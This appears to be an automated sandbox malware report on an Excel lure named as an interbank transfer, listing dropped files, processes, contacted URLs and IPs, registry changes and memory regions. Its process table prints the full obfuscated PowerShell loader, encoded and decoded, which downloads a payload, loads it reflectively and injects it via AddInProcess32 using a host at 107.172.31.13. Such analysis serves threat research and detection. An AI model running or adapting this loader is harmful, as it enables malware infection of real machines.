Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
transferencia interbancaria_66579.xlam.xlsx
|
Microsoft Excel 2007+
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\NIGHTTTTMPDW-constraints[1].vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\~$transferencia interbancaria_66579.xlam.xlsx
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\1n4jhjmf.bff.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bac2la0v.axw.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\pavil5nu.ag0.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\u3hmr3af.da3.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\Desktop\~$transferencia interbancaria_66579.xlam.xls
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
|
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient
= New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag
= gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex
= kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex +=
kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex,
kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes
= [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod
= [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0,
gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39)
| & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://107.172.31.13/NIGHTTTTMPDW-constraints.vbs
|
107.172.31.13
|
|
|
|
https://drive.google.
|
unknown
|
|
|
|
http://107.172.31.13/madamwebaaaaa.txt
|
107.172.31.13
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
https://account.dyn.com/
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://schemas.microsoft.co
|
unknown
|
||
|
http://107.172.31.13/NIGHTTTTMPDW-constraints.vbsj
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 14 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip-api.com
|
208.95.112.1
|
|
|
|
drive.google.com
|
216.58.212.174
|
||
|
drive.usercontent.google.com
|
142.250.186.97
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
|
|
|
107.172.31.13
|
unknown
|
United States
|
|
|
|
216.58.212.174
|
drive.google.com
|
United States
|
||
|
142.250.186.97
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
(=0
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
~`0
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
|
EquationEditorFilesIntl_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
|
EquationEditorFilesIntl_1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileDirectory
|
There are 35 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
723A000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
2B12000
|
heap
|
page read and write
|
||
|
4DEE000
|
stack
|
page read and write
|
||
|
5C42000
|
heap
|
page read and write
|
||
|
5000000
|
heap
|
page read and write
|
||
|
205000
|
trusted library allocation
|
page execute and read and write
|
||
|
240000
|
heap
|
page read and write
|
||
|
37B000
|
heap
|
page read and write
|
||
|
3319000
|
trusted library allocation
|
page read and write
|
||
|
2E2E000
|
stack
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
C52000
|
heap
|
page read and write
|
||
|
1CA2000
|
heap
|
page read and write
|
||
|
3452000
|
trusted library allocation
|
page read and write
|
||
|
26F000
|
heap
|
page read and write
|
||
|
4310000
|
trusted library allocation
|
page read and write
|
||
|
85F000
|
stack
|
page read and write
|
||
|
4220000
|
trusted library allocation
|
page read and write
|
||
|
4D90000
|
heap
|
page read and write
|
||
|
8CB1000
|
trusted library allocation
|
page read and write
|
||
|
495E000
|
stack
|
page read and write | page guard
|
||
|
5DAE000
|
stack
|
page read and write
|
||
|
1D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
264000
|
heap
|
page read and write
|
||
|
2B2E000
|
heap
|
page read and write
|
||
|
747000
|
heap
|
page read and write
|
||
|
2110000
|
heap
|
page read and write
|
||
|
990000
|
trusted library allocation
|
page read and write
|
||
|
1C4D000
|
stack
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
2B56000
|
heap
|
page read and write
|
||
|
282000
|
trusted library allocation
|
page read and write
|
||
|
4FD0000
|
heap
|
page read and write
|
||
|
870000
|
trusted library allocation
|
page read and write
|
||
|
3E61000
|
trusted library allocation
|
page read and write
|
||
|
44EB000
|
stack
|
page read and write
|
||
|
2100000
|
trusted library allocation
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
120000
|
trusted library allocation
|
page read and write
|
||
|
74B000
|
heap
|
page read and write
|
||
|
6D2D000
|
heap
|
page read and write
|
||
|
980000
|
trusted library allocation
|
page read and write
|
||
|
110000
|
trusted library allocation
|
page read and write
|
||
|
75A000
|
heap
|
page read and write
|
||
|
180000
|
heap
|
page read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
229C000
|
stack
|
page read and write
|
||
|
130000
|
trusted library allocation
|
page read and write
|
||
|
627000
|
heap
|
page read and write
|
||
|
200000
|
trusted library allocation
|
page read and write
|
||
|
2230000
|
trusted library allocation
|
page read and write
|
||
|
4A4000
|
heap
|
page read and write
|
||
|
1AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
894000
|
heap
|
page read and write
|
||
|
18A000
|
stack
|
page read and write
|
||
|
4ECE000
|
stack
|
page read and write
|
||
|
2573000
|
trusted library allocation
|
page read and write
|
||
|
49AE000
|
stack
|
page read and write
|
||
|
92B1000
|
trusted library allocation
|
page read and write
|
||
|
2AE000
|
heap
|
page read and write
|
||
|
6B6000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
4F8E000
|
stack
|
page read and write
|
||
|
248F000
|
stack
|
page read and write
|
||
|
1DB0000
|
direct allocation
|
page read and write
|
||
|
4C9E000
|
stack
|
page read and write
|
||
|
2A3000
|
heap
|
page read and write
|
||
|
212E000
|
stack
|
page read and write
|
||
|
49D0000
|
trusted library allocation
|
page read and write
|
||
|
978000
|
trusted library allocation
|
page read and write
|
||
|
5BCE000
|
stack
|
page read and write
|
||
|
4DAE000
|
stack
|
page read and write
|
||
|
5810000
|
heap
|
page read and write
|
||
|
337000
|
heap
|
page read and write
|
||
|
20FE000
|
stack
|
page read and write
|
||
|
4D6E000
|
stack
|
page read and write
|
||
|
43C0000
|
heap
|
page execute and read and write
|
||
|
2B1E000
|
heap
|
page read and write
|
||
|
1DA0000
|
heap
|
page read and write
|
||
|
238F000
|
stack
|
page read and write
|
||
|
2A2000
|
heap
|
page read and write
|
||
|
5D5E000
|
stack
|
page read and write
|
||
|
5D7000
|
trusted library allocation
|
page read and write
|
||
|
220000
|
trusted library allocation
|
page read and write
|
||
|
2B66000
|
heap
|
page read and write
|
||
|
242A000
|
trusted library allocation
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
2B42000
|
heap
|
page read and write
|
||
|
5E64000
|
heap
|
page read and write
|
||
|
522D000
|
stack
|
page read and write
|
||
|
1D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
531C000
|
heap
|
page read and write
|
||
|
335000
|
heap
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
5C24000
|
heap
|
page read and write
|
||
|
2FD000
|
heap
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
4270000
|
trusted library allocation
|
page execute and read and write
|
||
|
240000
|
heap
|
page read and write
|
||
|
238F000
|
stack
|
page read and write
|
||
|
C313000
|
trusted library allocation
|
page read and write
|
||
|
53FD000
|
heap
|
page read and write
|
||
|
242B000
|
trusted library allocation
|
page read and write
|
||
|
2250000
|
trusted library allocation
|
page read and write
|
||
|
4210000
|
trusted library allocation
|
page read and write
|
||
|
463000
|
heap
|
page read and write
|
||
|
5D0000
|
trusted library allocation
|
page read and write
|
||
|
2B31000
|
heap
|
page read and write
|
||
|
920000
|
trusted library allocation
|
page read and write
|
||
|
5E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5E60000
|
heap
|
page read and write
|
||
|
439E000
|
stack
|
page read and write
|
||
|
4FBC000
|
stack
|
page read and write
|
||
|
310000
|
trusted library allocation
|
page execute and read and write
|
||
|
52EE000
|
stack
|
page read and write
|
||
|
720D000
|
stack
|
page read and write
|
||
|
2483000
|
trusted library allocation
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
4910000
|
trusted library allocation
|
page read and write
|
||
|
210000
|
trusted library allocation
|
page read and write
|
||
|
301D000
|
heap
|
page read and write
|
||
|
4BDF000
|
stack
|
page read and write
|
||
|
81D000
|
stack
|
page read and write
|
||
|
21D1000
|
trusted library allocation
|
page read and write
|
||
|
21D000
|
trusted library allocation
|
page execute and read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
244C000
|
trusted library allocation
|
page read and write
|
||
|
748D000
|
stack
|
page read and write
|
||
|
230000
|
trusted library allocation
|
page read and write
|
||
|
5D9E000
|
stack
|
page read and write
|
||
|
2130000
|
trusted library allocation
|
page read and write
|
||
|
777000
|
heap
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
23C5000
|
trusted library allocation
|
page read and write
|
||
|
5A7E000
|
stack
|
page read and write
|
||
|
2BA9000
|
heap
|
page read and write
|
||
|
96C000
|
heap
|
page read and write
|
||
|
6D54000
|
heap
|
page read and write
|
||
|
4B1E000
|
stack
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
C338000
|
trusted library allocation
|
page read and write
|
||
|
2160000
|
heap
|
page execute and read and write
|
||
|
8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
360000
|
trusted library allocation
|
page read and write
|
||
|
4350000
|
trusted library allocation
|
page read and write
|
||
|
2F8E000
|
trusted library allocation
|
page read and write
|
||
|
740F000
|
stack
|
page read and write
|
||
|
ACB1000
|
trusted library allocation
|
page read and write
|
||
|
238E000
|
stack
|
page read and write | page guard
|
||
|
1FD000
|
heap
|
page read and write
|
||
|
751000
|
heap
|
page read and write
|
||
|
21D000
|
stack
|
page read and write
|
||
|
C30000
|
heap
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
2C8E000
|
stack
|
page read and write
|
||
|
2C0000
|
trusted library allocation
|
page read and write
|
||
|
2F0000
|
trusted library allocation
|
page read and write
|
||
|
301000
|
trusted library allocation
|
page read and write
|
||
|
4E6D000
|
stack
|
page read and write
|
||
|
777000
|
heap
|
page read and write
|
||
|
30E000
|
heap
|
page read and write
|
||
|
95C000
|
heap
|
page read and write
|
||
|
918000
|
heap
|
page read and write
|
||
|
6AF000
|
heap
|
page read and write
|
||
|
C2FF000
|
trusted library allocation
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
2B3A000
|
heap
|
page read and write
|
||
|
90D000
|
stack
|
page read and write
|
||
|
305000
|
trusted library allocation
|
page read and write
|
||
|
710F000
|
stack
|
page read and write
|
||
|
4F2E000
|
stack
|
page read and write
|
||
|
43EE000
|
stack
|
page read and write
|
||
|
2B13000
|
heap
|
page read and write
|
||
|
2457000
|
trusted library allocation
|
page read and write
|
||
|
13D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5061000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
277000
|
stack
|
page read and write
|
||
|
4236000
|
heap
|
page execute and read and write
|
||
|
6B7000
|
heap
|
page read and write
|
||
|
2FC000
|
trusted library allocation
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
6AD000
|
heap
|
page read and write
|
||
|
775000
|
heap
|
page read and write
|
||
|
2BC000
|
heap
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
4B0E000
|
stack
|
page read and write
|
||
|
8B2000
|
heap
|
page read and write
|
||
|
755000
|
heap
|
page read and write
|
||
|
247000
|
heap
|
page read and write
|
||
|
127000
|
stack
|
page read and write
|
||
|
518E000
|
stack
|
page read and write
|
||
|
248B000
|
trusted library allocation
|
page read and write
|
||
|
443A000
|
stack
|
page read and write
|
||
|
6B7000
|
heap
|
page read and write
|
||
|
220000
|
trusted library allocation
|
page read and write
|
||
|
2464000
|
trusted library allocation
|
page read and write
|
||
|
5D00000
|
heap
|
page read and write
|
||
|
60EE000
|
stack
|
page read and write
|
||
|
4230000
|
heap
|
page execute and read and write
|
||
|
2568000
|
trusted library allocation
|
page read and write
|
||
|
AC000
|
stack
|
page read and write
|
||
|
4360000
|
trusted library allocation
|
page read and write
|
||
|
5055000
|
heap
|
page read and write
|
||
|
89000
|
stack
|
page read and write
|
||
|
5EA0000
|
heap
|
page read and write
|
||
|
779000
|
heap
|
page read and write
|
||
|
25E6000
|
trusted library allocation
|
page read and write
|
||
|
338000
|
heap
|
page read and write
|
||
|
3A0000
|
trusted library allocation
|
page read and write
|
||
|
15A000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D0D000
|
stack
|
page read and write
|
||
|
2132000
|
heap
|
page read and write
|
||
|
4A0000
|
heap
|
page read and write
|
||
|
324000
|
heap
|
page read and write
|
||
|
2B53000
|
heap
|
page read and write
|
||
|
B50000
|
heap
|
page read and write
|
||
|
1C80000
|
heap
|
page read and write
|
||
|
4B2E000
|
stack
|
page read and write
|
||
|
607E000
|
stack
|
page read and write
|
||
|
77C000
|
heap
|
page read and write
|
||
|
2120000
|
trusted library allocation
|
page read and write
|
||
|
314000
|
heap
|
page read and write
|
||
|
43AE000
|
stack
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
2B56000
|
heap
|
page read and write
|
||
|
BCB1000
|
trusted library allocation
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
4340000
|
trusted library allocation
|
page read and write
|
||
|
2231000
|
trusted library allocation
|
page read and write
|
||
|
6EBC000
|
stack
|
page read and write
|
||
|
900000
|
trusted library allocation
|
page read and write
|
||
|
458E000
|
stack
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
301C000
|
heap
|
page read and write
|
||
|
2B3F000
|
heap
|
page read and write
|
||
|
2E9E000
|
stack
|
page read and write
|
||
|
2B36000
|
heap
|
page read and write
|
||
|
C351000
|
trusted library allocation
|
page read and write
|
||
|
C342000
|
trusted library allocation
|
page read and write
|
||
|
